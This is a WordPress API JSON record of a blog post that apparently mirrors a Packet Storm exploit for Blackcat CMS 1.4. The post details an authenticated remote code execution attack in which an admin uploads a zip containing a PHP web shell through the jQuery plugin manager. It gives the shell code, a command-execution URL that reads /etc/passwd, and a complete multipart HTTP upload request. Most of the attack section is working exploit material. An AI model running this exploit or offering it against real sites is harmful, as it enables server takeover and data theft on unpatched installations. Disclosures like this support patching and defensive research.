{"id":45382,"date":"2023-07-20T23:09:57","date_gmt":"2023-07-20T19:09:57","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/173639\/blackcatcms14-shell.txt"},"modified":"2023-07-23T10:14:25","modified_gmt":"2023-07-23T05:44:25","slug":"blackcat-cms-1-4-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/blackcat-cms-1-4-shell-upload\/","title":{"rendered":"Blackcat CMS 1.4 Shell Upload"},"content":{"rendered":"<p>Exploit Title: Blackcat CMS v1.4 &#8211; Remote Code Execution (RCE)<br \/>\nApplication: Blackcat CMS<br \/>\nVersion: v1.4<br \/>\nBugs: RCE<br \/>\nTechnology: PHP<br \/>\nVendor URL: https:\/\/blackcat-cms.org\/<br \/>\nSoftware Link: https:\/\/github.com\/BlackCatDevelopment\/BlackCatCMS<br \/>\nDate found: 13.07.2023<br \/>\nAuthor: Mirabbas A\u011falarov<br \/>\nTested on: Linux<\/p>\n<p>2. Technical Details &amp; POC<br \/>\n========================================<br \/>\nSteps:<br \/>\n1. Log in to the account as admin<br \/>\n2. Go to admin-tools =&gt; jquery plugin (http:\/\/localhost\/BlackCatCMS-1.4\/upload\/backend\/admintools\/tool.php?tool=jquery_plugin_mgr)<br \/>\n3. 
Upload a zip file, but this zip file must contain poc.php<br \/>\npoc.php file contents:<br \/>\n&lt;?php $a=$_GET['code']; echo system($a);?&gt;<br \/>\n4. Go to http:\/\/localhost\/BlackCatCMS-1.4\/upload\/modules\/lib_jquery\/plugins\/poc\/poc.php?code=cat%20\/etc\/passwd<\/p>\n<p>PoC request<\/p>\n<p>POST \/BlackCatCMS-1.4\/upload\/backend\/admintools\/tool.php?tool=jquery_plugin_mgr HTTP\/1.1<br \/>\nHost: localhost<br \/>\nContent-Length: 577<br \/>\nCache-Control: max-age=0<br \/>\nsec-ch-ua:<br \/>\nsec-ch-ua-mobile: ?0<br \/>\nsec-ch-ua-platform: &quot;&quot;<br \/>\nUpgrade-Insecure-Requests: 1<br \/>\nOrigin: http:\/\/localhost<br \/>\nContent-Type: multipart\/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.5735.134 Safari\/537.36<br \/>\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7<br \/>\nSec-Fetch-Site: same-origin<br \/>\nSec-Fetch-Mode: navigate<br \/>\nSec-Fetch-User: ?1<br \/>\nSec-Fetch-Dest: document<br \/>\nReferer: http:\/\/localhost\/BlackCatCMS-1.4\/upload\/backend\/admintools\/tool.php?tool=jquery_plugin_mgr<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-US,en;q=0.9<br \/>\nCookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti<br \/>\nConnection: close<\/p>\n<p>------WebKitFormBoundaryBRByJwW3CUSHOcBT<br \/>\nContent-Disposition: form-data; name=&quot;upload&quot;<\/p>\n<p>1<br \/>\n------WebKitFormBoundaryBRByJwW3CUSHOcBT<br \/>\nContent-Disposition: form-data; name=&quot;userfile&quot;; filename=&quot;poc.zip&quot;<br \/>\nContent-Type: application\/zip<\/p>\n<p>PKvalsdalsfapoc.php&lt;?php<br \/>\n$a=$_GET['code'];<br \/>\necho system($a);<br \/>\n?&gt;<br \/>\nblabalaboalpoc.php<br \/>\nblablabla<br 
\/>\n------WebKitFormBoundaryBRByJwW3CUSHOcBT<br \/>\nContent-Disposition: form-data; name=&quot;submit&quot;<\/p>\n<p>Upload<br \/>\n------WebKitFormBoundaryBRByJwW3CUSHOcBT--<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Title: Blackcat CMS v1.4 &#8211; Remote Code Execution (RCE) Application: Blackcat CMS Version: v1.4 Bugs: RCE Technology: PHP Vendor URL: https:\/\/blackcat-cms.org\/ Software Link: https:\/\/github.com\/BlackCatDevelopment\/BlackCatCMS Date found: 13.07.2023 Author: Mirabbas A\u011falarov Tested on: Linux 2. Technical Details &amp; POC ======================================== Steps: 1. Log in to the account as admin 2. Go to admin-tools =&gt; jquery plugin &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-45382","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45382","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=45382"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45382\/revisions"}],"predecessor-version":[{"id":45480,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45382\/revisions\/45480"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=45382"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-j
son\/wp\/v2\/categories?post=45382"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=45382"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}